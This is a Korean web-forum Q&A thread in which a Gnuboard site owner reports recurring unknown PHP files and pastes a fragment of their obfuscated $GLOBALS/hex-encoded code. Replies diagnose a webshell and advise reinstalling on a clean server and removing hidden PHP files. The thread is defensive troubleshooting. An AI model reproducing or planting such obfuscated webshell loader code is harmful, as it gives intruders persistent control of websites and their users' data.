해킹이의심되어서 글올려봅니다.

해킹이의심되어서 글올려봅니다.

QA

해킹이의심되어서 글올려봅니다.

답변 2

본문

몇주전부터 지속적으로 유독 그누보드쪽에 utf57.php,template87.php.... 등등 알수없는 파일들이 지속적으로 삽입되고 있습니다.

 

대부분 data폴더와 extend 폴더에 집중적으로 삽입되고 있으며, 해당파일을 열어보면

 

 

${"\x47\x4c\x4fB\x41\x4c\x53"}['v17d3'] = "\x6c\xa\x20\x2a\xd\x59\x27\x61\x55\x7a\x31\x62\x5a\x4b\x41\x60\x45\x4f\x2c\x48\x2f\x76\x79\x35\x5c\x54\x3b\x33\x53\x6f\x63\x58\x4a\x3d\x32\x75\x9\x30\x37\x2e\x73\x26\x2d\x39\x47\x3e\x7b\x5f\x57\x23\x7c\x56\x78\x50\x22\x34\x77\x64\x4e\x66\x5b\x38\x49\x6e\x21\x51\x70\x4c\x28\x43\x25\x24\x67\x68\x72\x6d\x7d\x3f\x65\x40\x42\x71\x74\x69\x6b\x29\x36\x3c\x6a\x3a\x5d\x46\x52\x4d\x7e\x44\x2b\x5e";
$GLOBALS[$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][11].$GLOBALS['v17d3'][30].$GLOBALS['v17d3'][59].$GLOBALS['v17d3'][61].$GLOBALS['v17d3'][55]] = $GLOBALS['v17d3'][30].$GLOBALS['v17d3'][73].$GLOBALS['v17d3'][74];

 

이러한 소스가 도배되어 있습니다.

이것 때문에 패스워드도 변경하고 ftp 포트도 변경하고 별짓을 다했는데도 끈질기게 올라오네요..

그누보드 data폴더등을 이름도 변경해보고 dbconfig.php파일 자체를 다른쪽으로옮겨도 보고

config파일에서 G5_등..접두어도 변경해서 해보아도 소용이 없습니다.

 

그누보드는 3년전에 설치했던거 같습니다. 이미 많은부분이 구조적으로 변경된상태라서

패치도 여의치 않은 상태입니다.

 

서버아이피를 변경해야 될련지... 경험있으신분들 조언좀 부탁드립니다. ㅠㅠ

이 질문에 댓글 쓰기 :

답변 2

이미 다 털렸네요.. 웹서버에 이미 웹셀이 설치된 경우입니다.

웹셀 파일을 찾아서 삭제한 다음... 깨끗한 서버에 재설치를 하셔야 합니다.

기존 서버에 감염된 파일만 지우겠다는 생각은 안하셨으면 합니다.

이미 한번 털린 서버는 다시 털릴 가능성이 99%입니다. 소스를 다 점검하시고, 깨끗한 서버에 설치하세요.

 

 

감사합니다... 웹쉘로 인해 일단, common.php 에서 extend 참조 하는 소스를 주석처리 하였습니다.
일단 모두 삭제는 하였습니다. 그리고 홈페이지 오픈하는데는 이상이 없는데요....

님 말씀처럼 서버를 다른곳으로 옮겨야 할듯합니다.

궁금한게 이러한 웹쉘공격으로 어떤 피해가 있을까요?
( 예).. 관리자접속번호 탈취, 서버트래픽발생등등...)
잘 몰라서 한번 물어봅니다...ㅜㅜ

개인정보 취득, 비밀번호 취득을 통해서 계정정보를 3자에게 판매할 가능성이 높습니다.
결제가 있는 사이트라면 결제정보를 조작하여 금전적 이득을 취할수도 있습니다.

ssh 접속해서 hidden 파일은 없는지 확인해보세요

기본폴더 , extend 폴더 , data 폴더 등에 숨김파일이 존재할수 있습니다.

ls -al  명령어를 이용하면 확인할 수 있습니다.

data 폴더에는 이미지 파일 외에 .php 형식으로 존재하는 것을 모두 삭제하세요

역시 숨김파일로 존재하는 것이 있을수 있습니다.

답변을 작성하시기 전에 로그인 해주세요.
QA 내용 검색
질문등록
전체 91
© SIRSOFT
현재 페이지 제일 처음으로